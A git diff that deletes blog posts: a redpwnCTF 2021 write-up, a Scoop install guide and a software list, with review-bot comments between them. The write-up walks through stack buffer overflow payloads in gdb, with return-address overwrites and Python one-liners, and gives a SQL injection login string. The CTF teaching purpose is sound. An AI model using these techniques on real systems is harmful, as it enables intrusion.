-Since I didn't see any reference to a flag file being read, I assumed that the
-`system("/bin/sh")` call is our main target, so let's see if we can find that
-in our assembly code. There's a call to `<system@plt>` at `<main+189>`, and
-there's other weird `cmp`, `jne` and `lea` instructions before. Let's figure
-out what those do!
-
-After some stackoverflow soul searching, I found out that the `cmp` and `jne`
-are assembly instructions for compare, and jump-if-not-equal. They work like
-this:
-
-```asm6502
-; cmp compares what's in the $rbp register to 0xffffffffffffffff
-; and turns on the ZERO flag if they're equal
- 0x004012a5 <+0>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff
-
-; jne checks if the ZERO flag is on,
-; and if it is it jumps (in this case) to 0x4012b8
-┌--0x004012aa <+1>: jne 0x4012b8 <main+194>
-│; we can safely ignore the `lea` instruction as it doesn't impact our pwn
-│ 0x004012ac <+2>: lea rdi,[rip+0xf35] # 0x4021e8
-│
-│; the almighty syscall
-│ 0x004012b3 <+3>: call 0x4010c0 <system@plt>
-│
-│; from here on the program exits without calling /bin/sh
-└->0x004012b8 <+4>: mov eax,0x0
- 0x004012bd <+5>: leave
- 0x004012be <+6>: ret
-```
-
-The program checks if there's `0xffffffffffffffff` in memory `0x8` bytes before
-the `$rbp` register. The program allocates 32 bytes of memory for our heartfelt
-message, but it continues reading even if our heartfelt message is longer than
-32 bytes. Let's see if we can overwrite that register >:)
-
-Let's set a breakpoint after the `<gets@plt>` call in gdb, and run the program
-with 40 bytes of `0x61` ('a')
-
-```
-(gdb) break *0x00000000004012a5
-Breakpoint 1 at 0x4012a5
-
-(gdb) run < <(python3 -c "print('a' * 40)")
-```
-
-I'm using the `run` command with `<` and `<()` to pipe the output of python
-into the program's `stdin`. It's unnecessary at this stage because there's an
-'a' key on my keyboard, but if we were to send raw bytes, this would make it a
-lot easier.
-
-I'm also using [gef](https://github.com/hugsy/gef) so I get access to a command
-called `context` which prints all sorts of information about registers, the
-stack and a small disassembly window. I won't show it's output here, but it
-was an indispensable tool that you should install nonetheless.
-
-Let's print the memory at `[$rbp - 0x8]`:
-
-```
-(gdb) x/8gx $rbp - 0x8
-0x7fffffffd758: 0x0000000000000000 0x0000000000000000
-0x7fffffffd768: 0x00007ffff7de4b25 0x00007fffffffd858
-0x7fffffffd778: 0x0000000100000064 0x00000000004011f6
-0x7fffffffd788: 0x0000000000001000 0x00000000004012c0
-```
-
-Hmmm, no overwriteage yet. Let's try 56 bytes instead:
-
-```
-(gdb) run < <(python3 -c "print('a' * 56)")
-(gdb) x/8gx $rbp - 0x8
-0x7fffffffd758: 0x6161616161616161 0x6161616161616161
-0x7fffffffd768: 0x00007ffff7de4b00 0x00007fffffffd858
-0x7fffffffd778: 0x0000000100000064 0x00000000004011f6
-0x7fffffffd788: 0x0000000000001000 0x00000000004012c0
-(gdb) x/1gx $rbp - 0x8
-0x7fffffffd758: 0x6161616161616161
-```
-
-Jackpot! We've overwritten 16 bytes of the address that the `cmp` instruction
-reads. Let's try setting it to `0xff` instead, so we get a shell. Python 3 is
-not that great for binary exploitation, so the code for this is a little bit
-ugly, but if it works, it works!
-
-```
-(gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)")
-(gdb) x/1gx $rbp - 0x8
-0x7fffffffd758: 0xffffffffffffffff
-```
-
-Now let's let execution continue as normal by using the `continue` command:
-
-```
-(gdb) continue
-Continuing.
-[Detaching after vfork from child process 22950]
-[Inferior 1 (process 22947) exited normally]
-```
-
-This might seem underwhelming, but our explit works! A child process was
-spawned, and as a bonus, we didn't get any segmentation faults! The reason we
-don't get an interactive shell is because we used python to pipe input into the
-program which makes it non-interactive.
-
-At this point I was about 12 hours in of straight gdb hell, and I was very
-happy to see this shell. After discovering this, I immediately tried it outside
-the debugger and was dissapointed to see that my exploit didn't work. After a
-small panick attack I found out this was because of my environment variables.
-You can launch an environment-less shell by using the `env -i sh` command:
-
-```
-λ generic → λ git master* → env -i sh
-sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0
-"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨"
-rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
-can you write me a heartfelt message to cheer me up? :(
-sh-5.1$ # another shell :tada:
-```
-
-Now it was time to actually do the exploit on the remote server.
-
-I whipped up the most disgusting and janky python code that I won't go into
-detail about, but here's what is does (in short):
-
-1. Create a thread to capture data from the server and forward it to `stdout`
-2. Capture user commands using `input()` and decide what to do with them on the main thread
-
-The code for this script can be found
-[here](https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py),
-though be warned, it's _very_ janky and you're probably better off copying
-stuff from stackoverflow. Writing your own tools is more fun though, and might
-also be faster than trying to wrestle with existing tools to try to get them to
-do exactly what you want them to do. In this case I could've also just used [a
-simple
-command](https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1).
-
-It did help me though and I actually had to copy it for use in the other buffer
-overflow challenge that I solved, so I'll probably refactor it someday for use
-in other CTFs.
-
-### crypto/round-the-bases
-
-This crypto challenge uses a text file with some hidden information. If you
-open up the file in a text editor, and adjust your window width, you'll
-eventually see the repeating pattern line up. This makes it very easy to see
-what part of the pattern is actually changing:
-
-```
-----------------------xxxx----
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
-```
-
-I wrote a simple python script to parse this into binary data, and it worked on
-the first try:
-
-```py
-# read the file into a string
-file = open("./round-the-bases")
-content = file.read()
-file.close()
-
-# split on every 30th character into a list
-n = 30
-arr = [ content[i : i + n] for i in range(0, len(content), n) ]
-
-bin = []
-for line in arr:
- sub = line[16:20] # the part that changes
- if sub == 'IIcu': # IIcu -> 0x0
- bin.append('0')
- else: # K0o0 -> 0x1
- bin.append('1')
-
-bin = ''.join(bin) # join all the list indices together into a string
-
-# decode the binary string into ascii characters
-for i in range(0, len(bin), 8):
- print(chr(int(bin[i:i+8], 2)), end='')
-
-# newline for good measure
-print("\n", end='')
-```
-
-### pwn/ret2generic-flag-reader
-
-This was the second binary exploitation challenge I tackled, and it went much
-better than the first because I (sort of) knew what I was doing by now.
-
-I figured the 'ret2' part of the title challenge was short for 'return to', and
-my suspicion was confirmed after looking at the c source:
-
-```c
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-void super_generic_flag_reading_function_please_ret_to_me()
-{
- char flag[0x100] = {0};
- FILE *fp = fopen("./flag.txt", "r");
- if (!fp)
- {
- puts("no flag!! contact a member of rob inc");
- exit(-1);
- }
- fgets(flag, 0xff, fp);
- puts(flag);
- fclose(fp);
-}
-
-int main(void)
-{
- char comments_and_concerns[32];
-
- setbuf(stdout, NULL);
- setbuf(stdin, NULL);
- setbuf(stderr, NULL);
-
- puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...");
- puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!");
- puts("slap on some flavortext and there's no way rob will fire me now!");
- puts("this is genius!! what do you think?");
-
- gets(comments_and_concerns);
-}
-
-```
-
-With my newfound knowledge of binary exploitation, I figured I would have to
-overwrite the return pointer on the stack somehow, so the program calls the
-`super_generic_flag_reading_function_please_ret_to_me` function that isn't
-called at all in the original.
-
-The only input we have control over is again a call to `gets();`
-
-Let's look at the disassembly in gdb:
-
-```
-(gdb) disas main
-Dump of assembler code for function main:
- 0x00000000004013f4 <+79>: call 0x4010a0 <puts@plt>
- 0x00000000004013f9 <+84>: lea rdi,[rip+0xca0] # 0x4020a0
- 0x0000000000401400 <+91>: call 0x4010a0 <puts@plt>
- 0x0000000000401405 <+96>: lea rdi,[rip+0xd0c] # 0x402118
- 0x000000000040140c <+103>: call 0x4010a0 <puts@plt>
- 0x0000000000401411 <+108>: lea rdi,[rip+0xd48] # 0x402160
- 0x0000000000401418 <+115>: call 0x4010a0 <puts@plt>
- 0x000000000040141d <+120>: lea rax,[rbp-0x20]
- 0x0000000000401421 <+124>: mov rdi,rax
- 0x0000000000401424 <+127>: call 0x4010e0 <gets@plt>
- 0x0000000000401429 <+132>: mov eax,0x0
- 0x000000000040142e <+137>: leave
- 0x000000000040142f <+138>: ret
-End of assembler dump.
-```
-
-We see again multiple calls to `<puts@plt>` and right after a call to
-`<gets@plt>`. There is no `cmp` and `jne` to be found in this challenge though.
-
-The goal is to overwrite the _return address_. This is a memory address also
-stored in memory, and the program will move execution to that memory address
-once it sees a `ret` instruction. In this 'vanilla' state, the return address
-always goes to the assembly equivalent of an `exit()` function. Let's see if we
-can overwrite it by giving too much input:
-
-```
-(gdb) break *0x000000000040142f
-Breakpoint 1 at 0x40142f
-(gdb) run < <(python3 -c "print('a' * 56)")
--- Breakpoint 1 hit --
-(gdb) info registers
-rax 0x0 0x0
-rbx 0x401430 0x401430
-rsi 0x7ffff7f7d883 0x7ffff7f7d883
-rdi 0x7ffff7f804e0 0x7ffff7f804e0
-rbp 0x6161616161616161 0x6161616161616161
-rsp 0x7fffffffd898 0x7fffffffd898
-rip 0x40142f 0x40142f <main+138>
-```
-
-As you can see, the $rbp register is completely overwritten with `0x61`'s.
-Let's check the $rsp register to see where the `main()` function tries to go
-after `ret`:
-
-```
-(gdb) run
-Starting program: ret2generic-flag-reader
-alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
-how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
-slap on some flavortext and there's no way rob will fire me now!
-this is genius!! what do you think?
-a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3
--- Breakpoint 1 hit --
-(gdb) x/1gx $rsp
-0x7fffffffd898: 0x3363326331633063
-```
-
-Let's use CyberChef to see what `0x3363326331633063` is in ascii!
-
-![](/img/redpwn2021/cyberchef1.png)
-
-Hmm, it's backwards. Let's reverse it!
-
-![](/img/redpwn2021/cyberchef2.png)
-
-Let's find the address of the super generic flag reading function with gdb.
-
-```
-(gdb) print super_generic_flag_reading_function_please_ret_to_me
-$2 = {<text variable, no debug info>} 0x4011f6 <super_generic_flag_reading_function_please_ret_to_me>
-```
-
-Now we're ready to craft a string that exploits the program and runs the secret
-function!
-
-```
-a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original
- c0c1c2c3 <- ends up in $rsp
-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <- padding ( 0x28 * 'a' )
-
- c 0 c 1 c 2 c 3 <- ends up in $rsp
- 3 c 2 c 1 c 0 c <- reverse
-0x3363326331633063 <- reverse (hex)
-0x00000000004011f6 <- pointer we want in $rsp
- f611400000000000 <- reverse
- \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring
-
-exploit string:
-b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00'
-```
-
-Now let's try it in an environment-less shell:
-
-```
-python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader
-alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
-how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
-slap on some flavortext and there's no way rob will fire me now!
-this is genius!! what do you think?
-flag{this_is_a_dummy_flag_go_solve_it_yourself}
-
-Segmentation fault (core dumped)
-sh-5.1$
-```
-
-### rev/bread-making
-
-For this challenge, I first tried using iaito again to do some program flow
-analysis. After giving up on that, I decided to instead brute-force the correct
-steps by hand. This was a very long and boring process.
-
-First I used `strings` again to extract all the dialogue and user input strings
-from the binary. Then I filtered them to not include obvious dialogue, but only
-the possible user input strings. And this is the correct path that gives the
-flag:
-
-```
-add flour
-add salt
-add yeast
-add water
-hide the bowl inside a box
-wait 3 hours
-work in the basement
-preheat the toaster oven
-set a timer on your phone
-watch the bread bake
-pull the tray out with a towel
-open the window
-unplug the oven
-unplug the fire alarm
-wash the sink
-clean the counters
-flush the bread down the toilet
-get ready to sleep
-close the window
-replace the fire alarm
-brush teeth and go to bed
-```
-
-In hindsight I could've probably made a simple python script to brute force all
-remaining possibilities until it got longer output from the program, but
-laziness took over and I decided that spending 45 minutes doing very dull work
-was more worth it instead.
-
-## Willem's part in the CTF
-
-Hi, Willem here.
-
-In this part I will talk about my experience during the CTF and The
-collaboration between me and Loek.
-
-### web/orm-bad
-
-This was also my first CTF, just like Loek, because of this was quite uncertain
-about my skill level. For example, I have no experience using Linux systems,
-but from what I learned before the CTF it is quite essential. My fear of not
-being able to do any of the challenges disappeared quickly after we had
-completed the beginner challenges. With a simple sql injection I got my first
-real flag:
-
-```
-username: admin';--
-password:
-flag{this_is_a_dummy_flag_go_solve_it_yourself}
-```
-
-We had planned to use github's projects to track progress on challenges, but
-when you're actually doing a challenge it's the last thing you think about.
-So, we didn't really know who was doing which challenge, but because we're a
-team of two this wasn't a big problem.
-
-The most challenge were a bit to hard for me. Some I would get pretty far, but
-needed Loek's help to solve it. Others I didn't even attempt to begin on.
-
-### misc/the-substitution-game
-
-One challenge I spend a lot of time on was __The substitution game__. In the
-substitution game you had to substitute certain parts of the input string to
-get the desired output string. I got to level for of 6. Level 1 and 2 to were
-really simple, but at level 3 you started to need to really understand the
-game.
-
-```
-level 3:
-initial: aaaaaaaaaaaaaa (the amount of a's varied)
-target: a
-```
-
-The solution is really simple, but it's pretty hard to get to it. You want to
-remove 'a's so I started with `a => `, this turn all 'a's to None and left you
-with an empty string. The problem is you can't substitute anything in an empty
-string. The solution was `aa => a`, this removed an 'a' every time the initial
-string got checked. To get this solution you had to realize, that the program
-would always substitute the first instance it would come across, and the
-program was set to do way more than needed substitutions. This would come handy
-in the next level.
-
-```
-level 4:
-initial: ggggggggggg (the amount of g's varied)
-target: ginkoid
-```
-
-After completing level 3 this level looks very easy, just substitute the g's
-like before `gg => g` and turn the last g into ginkoid `g => ginkoid` , but
-this didn't work because of the way the program worked, after getting to a
-valid solution I didn't stop and the single g in ginkoid would also change to
-ginkoid. You would get infinite ginkoid. The solution was:
-
-```
-gg => ginkoid; ginkoidginkoid => ginkoid; ginkoidg => ginkoid
-```
-
-I began with noticing you couldn't just change the g, because that would also
-change the g in ginkoid. so double gg becomes ginkoid. We have to use the same
-trick as in level 3 to gain only one ginkoid `ginkoidginkoid => ginkoid`
-because of the way we changed the single g's to ginkoid it would only work with
-an even amount of g's. In the case there was an uneven amount of g's we would
-be left with ginkoidg, so we remove it `ginkoidg => ginkoid`.
-
-I found this challenge really enjoyable and during this challenge I noticed
-that I most enjoy the puzzle aspect of computer science, puzzling for hours to
-fix a bug and then finally finding a solution.
-
-I didn't complete many challenges and wasn't really able to help Loek, but I
-really enjoyed the CTF. It's a really fun way to test your skills and
-knowledge. In the end I'm really happy with the score we (mostly Loek) got and
-I think I’ll take part in other CTFs in the future.
-
-## Epilogue
-
-Of the 47 total challenges, me and Willem only solved 15. My end goal for this
-CTF wasn't winning to begin with, so the outcome didn't matter for me. After
-the second day I set the goal of reaching the 3rd page of the leaderboards as
-my goal, and we reached 277'th place in the end which made my mom very proud!
-
-![](/img/redpwn2021/leaderboard.png)
-
-I enjoyed the CTF a lot! There were some very frustrating challenges, and I
-still don't get how people solved web/wtjs, but that's fine. I did learn how to
-use GDB and a lot of other things during the CTF which were all very rewarding.
-I will definitely be participating in the 2022 redpwnCTF, and maybe even some
-others if they're beginner friendly :)
-
-During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe
-host one myself, though I have no clue where to start with that. Maybe keep an
-eye out for that ;)
-
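Review bot: the removal of posts/redpwn2021.md drops the references to `/img/redpwn2021/cyberchef1.png`, `/img/redpwn2021/cyberchef2.png` and `/img/redpwn2021/leaderboard.png`, and the diffstat lists no new location for the write-up under `posts/`. Please say in the commit message where the post now lives, and remove or relocate those images in the same change so they are not left orphaned. If the text is carried over, correct the annotated disassembly on the way: the comment on `cmp QWORD PTR [rbp-0x8],0xffffffffffffffff` says it compares what is in the `$rbp` register, but the operand is the 8 bytes stored at `rbp-0x8`, and the comment on `jne` says the jump is taken when the ZERO flag is on, whereas `jne` jumps when that flag is clear.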
diff --git a/posts/scoop.md b/posts/scoop.md
deleted file mode 100644
index aa60934..0000000
--- a/posts/scoop.md
+++ /dev/null
@@ -1,115 +0,0 @@
-[meta]: <title> (Scoop guide)
-[meta]: <subtitle> (Handbook and quick explanations)
-[meta]: <author> (Loek)
-[meta]: <date> (July 22 2021)
-[meta]: <tags> (windows, normie, software)
-[meta]: <cover> (/img/scoop.png)
-
-Here's a quick reference for returning customers:
-
-```bash
-# installing stuff
-scoop install <program name>
-
-# removing stuff
-scoop uninstall <program name>
-
-# updating all the stuff
-scoop update *
-
-# update single stuff
-scoop update <program name>
-
-# add a bucket / repository
-scoop bucket add <bucket name>
-
-# searching for stuff
-scoop search <search term>
-# keep in mind that scoop's search is very slow
-```
-
-For more things look in the [wiki](https://github.com/lukesampson/scoop/wiki)
-or in the wiki's [faq](https://github.com/lukesampson/scoop/wiki/FAQ).
-
-Now here's a list of things that people who don't use `cmd` get confused about:
-
-- Highlighting text in cmd selects it. If you've selected text, right click
- copies it. If you don't have text selected, right click pastes it.
-- Ctrl-c and ctrl-v won't work as you expect them to. The same goes for most
- keyboard shortcuts commonly used in graphical ('normal') programs. Ctrl-c is
- used to stop programs in cmd, and ctrl-v doesn't do anything. The keyboard
- shortcut for pasting in cmd is shift+insert.
-- Clicking inside the cmd window to place your text cursor doesn't work,
- because clicking is only used for selection. You'll have to use your arrow
- keys to move the cursor. You can also use ctrl-a to move it to the beginning
- of a line, or ctrl-e to move it to the end of a line.
-- It's normal for programs in cmd to not give any output and just silently
- quit. This is normal and if a program doesn't output anything you can assume
- it did the thing you wanted it to do. (though scoop is very verbose and will
- print progress info most of the time)
-- You can type new commands for the computer to execute once you see the prompt
- again. Most of the time it looks something like this:
-
- ```
- C:\Windows\System32>
- ```
-
-## Installation (on a fresh system)
-
-```powershell
-Set-ExecutionPolicy RemoteSigned -scope CurrentUser
-iwr -useb get.scoop.sh | iex
-```
-
-## Some more things explained
-
-### Why scoop at all
-
-Scoop is a package manager. These are the primary way you install software on
-Linux. The reason package managers are awesome, is because it's like an app
-store in the sense that it's one central place to install all your software,
-but without the downsides of an actual app store.
-
-If you develop your own software, you can write a scoop install script for it,
-and create a pull request on GitHub. This way basically anyone can add software
-into scoop, but it's still moderated better than for example wikipedia.
-
-Scoop also has more open source software, which is better (most of the time).
-This means you're more likely to get 'better software' like 7-zip instead of
-(bad) (paid) software like winrar or winzip.
-
-Scoop also uses powershell scripts to install software which means you won't
-have to click through installers, or watch out for sneaky buttons that also
-install some weird toolbar in your browser.
-
-### Buckets
-
-Buckets are a collection of similar programs. The way these are managed is
-through something called a repository. This is just a central place for
-multiple people to view and collaborate on scoop at once.
-
-Buckets you'll probably want to add are `extras`, `nonportable`, `games`, and
-`java`.
-
-By adding a bucket you're not actually installing any software, but scoop will
-check for updates on that bucket.
-
-If you want to for example install java using scoop, you'll first have to add
-the `java` bucket by running `scoop bucket add java` in order for scoop to be
-able to find the `openjdk` package. Then you can run `scoop install openjdk`,
-and then you'll have java installed.
-
-### Brave (browser)
-
-Because the default brave browser in scoop isn't updated, I use the [everonline
-repo](https://github.com/everonline/brave). Here's how to do that:
-
-```bash
-scoop bucket add everonline https://github.com/everonline/brave.git
-scoop install everonline/brave
-```
-
-## Awesome software
-
-[Here's](/post/software#pc-software) a list of the software I use pretty much every day,
-and some of it is also available for windows using scoop!
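Review bot: this deletes the whole Scoop guide, including its `/img/scoop.png` cover and the link to `/post/software#pc-software`, a post the same commit also deletes. Please state in the commit message whether the guide is retired or moved, and drop or relocate the cover image with it. If it is moved, do not carry the install snippet over unchanged: `iwr -useb get.scoop.sh | iex` leaves the URL scheme to the client's default and pipes the download straight into `iex`, so write out `https://get.scoop.sh` and suggest saving the script for inspection before running it. The `scoop bucket add everonline https://github.com/everonline/brave.git` lines deserve a sentence noting that a third-party bucket is trusted to run install scripts.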
diff --git a/posts/software.md b/posts/software.md
deleted file mode 100644
index 2a06fed..0000000
--- a/posts/software.md
+++ /dev/null
@@ -1,275 +0,0 @@
-[meta]: <title> (Software that I use)
-[meta]: <subtitle> (Desktop software, server software, phone apps, everything)
-[meta]: <author> (Loek)
-[meta]: <date> (April 13 2021)
-[meta]: <tags> (software, open source, server, phone)
-[meta]: <cover> (/img/software.png)
-
-## PC software
-
-All of the software on this page is cool and I think you should try it. I also
-use all of this software, and will update this page when I find new, *even
-cooler* software to use instead. Most if not all of my configuration files
-(dotfiles) are on my [github](https://github.com/lonkaars/dotfiles). You can
-clone these and edit them to fit your needs, or you can use them as a reference
-for when you can't figure out how to configure something.
-
-### Regular software
-
-- **Email client**: [neomutt](https://neomutt.org/). It's fast and simple,
- though configuring it was a pain in the ass. I'm currently using it in
- combination with mbsync and imapnotify to get notifications for new emails,
- and sync my mailbox for fast email viewing.
-
-- **Music player**: [mpd](https://www.musicpd.org/) with
- [ncmpcpp](https://github.com/ncmpcpp/ncmpcpp). This is the best music setup
- I've ever used. I download all my music in .flac format and mpd *just works*.
- Since mpd has a server-client structure, I could also use this to set up
- multiple devices that can add music to a central queue at a party or
- something, but I just use it to launch [an fzf mpc
- wrapper](https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp) to
- quickly add music while I'm doing something else.
-
-- **Text editor**: [nvim](https://neovim.io/). It's vim. If you don't like vim,
- you should try using it longer. If you still don't like vim, you can use
- [code oss](https://appimage.github.io/Code_OSS/) which is visual studio code
- but without Microsoft's creepy telemetry features.
-
-- **PDF viewer**: [zathura](https://pwmt.org/projects/zathura/). It's a pdf
- viewer with vim bindings, and it works with my TeX editing setup's live
- reload thingy.
-
-- **Image viewer**: [sxiv](https://github.com/muennich/sxiv). It's like zathura
- but for images, but it also does a bunch of other stuff that I don't use very
- often.
-
-- **Browser**: [brave](https://brave.com/). It's a normie-friendly chromium
- fork with extra privacy features! I of course use brave (or any
- chromium-based browser) with [tampermonkey](https://www.tampermonkey.net/),
- [ublock origin](https://ublockorigin.com/),
- [stylus](https://github.com/openstyles/stylus) and [dark
- reader](https://darkreader.org/).
-
-- **Terminal**: [st](https://st.suckless.org/). It's fast and simple, nothing
- to complain about. I have my [own st fork](https://github.com/lonkaars/st),
- with a bunch of patches that make me happy.
-
-- **Password manager**: [bitwarden](https://bitwarden.com/). Open source
- password manager that you can host yourself. It also has public servers which
- are mostly free, but some features like time-based one-time passwords are
- paid. All the clients are also open source.
-
-- **Document typesetting**: [LaTeX](https://www.latex-project.org/) (using
- [latexmk](https://personal.psu.edu/~jcc8/software/latexmk/) with the
- [XeTeX](http://xetex.sourceforge.net/) compiler).
-
-- **File browser**: [ranger](https://github.com/ranger/ranger). It's kind of
- slow, but I use the bulkrename feature very often, and I haven't gotten used
- to the perl `rename` script yet.
-
-- [unar](https://github.com/MacPaw/XADMaster). I like running `unar [archive]`
- instead of using `7z`, `tar`, `unzip`, etc. It creates a new folder to unpack
- to automatically so it does exactly what I need.
-
-### OS stuff
-
-- **Window manager**: [i3-gaps](https://github.com/Airblader/i3). I tried it
- once and didn't switch back so this is a winner I guess. I've also heard good
- things about [dwm](https://dwm.suckless.org/), though I haven't used it
- myself. Most people complain about i3's limited configurability, but I
- haven't ran into something that it doesn't do for me.
-
-- **Application launcher**: [rofi](https://github.com/davatorium/rofi). I've
- been using rofi since I started using linux, and haven't switched to anything
- else because it's *very* configurable, and has a dmenu mode for using it
- instead of dmenu with other scripts. I use it primarily as my application
- launcher, but I also have a hotkey setup to launch `bwmenu` which is a script
- that fills in bitwarden passwords using rofi.
-
-- **Shell**: [zsh](https://www.zsh.org/) with [oh-my-zsh](https://ohmyz.sh/).
- It's zsh, all the cool kids use it already. I do have `/usr/bin/sh` `ln -s`'d
- to `/usr/bin/bash`, but I'd like to change that to `/usr/bin/dash`. Eh, I'll
- get around to it someday.
-
-- **Status Bar**: [polybar](https://github.com/polybar/polybar). Simple bar,
- gets the job done, the configuration files make me go insane though. It took
- me a good half year of ricing to understand the polybar configuration files,
- and I'm still not sure if I do.
-
-- **Notification daemon**: [dunst](https://dunst-project.org/). I used to use
- deadd-notification-center, but that has waaaay too many haskell dependencies
- on arch, so I don't use that anymore.
-
-- **Global keybinds**:
- [xbindkeys](https://www.nongnu.org/xbindkeys/xbindkeys.html). Simple
- configuration, works flawlessly, 10/10.
-
-- **Compositor**: [picom](https://github.com/yshui/picom). It's a simple
- compositor. I use it to enable vsync for desktop windows, and I have it set
- up to only show a drop shadow on floating i3 windows.
-
-### Closed source
-
-- [discord](https://discord.com/). Gamer. The only reason this is listed here
- is because I use discord with
- [betterdiscord](https://github.com/rauenzi/BetterDiscordApp) (which *is*
- open-source). Betterdiscord allows you to use custom css themes, custom
- plugins and a whole bunch of other cool stuff that regular discord doesn't
- do. It's technically against TOS, but I don't really care as I only use
- quality of life improvement plugins.
-
-- [figma](https://figma.com). It's the designing software that I use to create
- user interface or website mockups. It's easily accessible though a browser,
- and it uses webassembly so it's also decently fast. It's free for personal
- use.
-
-## Server software
-
-This is the software that runs on my home server.
-
-### Email
-
-I used [Luke Smith's](http://lukesmith.xyz/)
-[emailwiz](https://github.com/LukeSmithxyz/emailwiz) to set up my email server.
-The script installs and configures an email setup with
-[postfix](http://www.postfix.org/), [dovecot](https://www.dovecot.org/),
-[spamassassin](https://spamassassin.apache.org/) and
-[opendkim](http://www.opendkim.org/).
-
-### Etesync
-
-I run my own [etesync](https://www.etesync.com/) server for synchronizing my
-to-do lists, calendar and contacts. It's relatively easy to set up, and has a
-web interface that you can use with your own self-hosted instance.
-
-### Bitwarden
-
-I also run my own [bitwarden](https://github.com/bitwarden/server) server. It
-uses docker with docker-compose, which are two things that I'm supposed to know
-about, but I don't.
-
-I'm working on a connect 4 website myself, and I'm planning on learning to use
-docker with docker-compose to make it easier to run the seperate parts that are
-needed to host the project.
-
-### Git
-
-I have a [cgit](https://git.zx2c4.com/cgit/about/) server to host my git
-repositories on <https://git.pipeframe.xyz>, and I use
-[gitolite](https://gitolite.com/gitolite/) for ssh git push access. Cgit is
-very easy to set up, and I like it very much. Gitolite on the other hand is a
-pain in the ass to set up, because the documentation is not that great. If
-you're planning on using gitolite on your own server, set the umask in
-`~/.gitolite.rc` of your server's git account to `0022`.
-
-### SFTP
-
-I have two semi-public sftp accounts set up on my server: `media` and `sftp`.
-`sftp` is for generic file sharing, and `media` is for my media. Both accounts
-have tty login disabled and are chroot-jailed to /var/media and /var/sftp.
-
-## Phone apps
-
-These are the apps that I use on my phone. I recently upgraded my 2017 Nokia 6
-to a Google Pixel 4a (sunfish). It's a great phone! You can root it or flash
-custom rom's very easily, and it gave me new appreciation for the basic
-features of a smartphone. The Pixel 4a has really good haptics. They're almost
-iPhone level, though I won't be using iPhones any time soon.
-
-I flashed [CalyxOS](https://calyxos.org/) as soon as it was 5 minutes out of
-the box, but ended up not liking it because of it's nonexistant root support.
-I'm currently using [LineageOS](https://lineageos.org/) 18.1, rooted using
-[magisk](https://github.com/topjohnwu/Magisk).
-
-### Open source
-
-- **One-time password generator**: [andotp](https://github.com/andOTP/andOTP)
-
-- **App store**: [aurora store](https://gitlab.com/AuroraOSS/AuroraStore). This
- app works better when you're rooted, but it's way better than the google play
- store.
-
-- **App store**: [aurora f-droid](https://gitlab.com/AuroraOSS/auroradroid)
-
-- **Password manager**: [bitwarden](https://github.com/bitwarden/mobile)
-
-- **Browser**: [bromite](https://www.bromite.org/). This is basically ungoogled
- chromium but for mobile.
-
-- **Calendar**: [etar](https://github.com/Etar-Group/Etar-Calendar)
-
-- [etesync](https://github.com/etesync/android)
-
-- **File browser**: [material
- files](https://github.com/zhanghai/MaterialFiles). It looks sexy, it's free,
- it's awesome.
-
-- **Email client**: [k-9](https://k9mail.app/).
-
-- **Maps**: [osmand](https://osmand.net/).
-
-- **Music player**: [shuttle](https://www.shuttlemusicplayer.com/). It looks
- sexy, it's free, it's awesome.
-
-- **Instant messenger**: [signal](https://signal.org/). [papa musk said
- it](https://twitter.com/elonmusk/status/1347165127036977153).
-
-- **Manga reader**: [tachiyomi](https://tachiyomi.org/)
-
-- **To-do lists**: [tasks.org](https://tasks.org/). This is easily the best
- to-do app I've ever used, and it integrated very well with etesync.
-
- If you're cheap (like me), you can get 'free' pro by downloading this app
- through f-droid instead of the play store. It's still nice to donate.
-
-- **Smart home control**: [home assistant](https://www.home-assistant.io/).
- [the whole spiel](/post/homeauto).
-
-- **Notes**: [leaflet](https://github.com/PotatoProject/Leaflet). It's
- basically Google Keep but open source and without Google. It's part of the
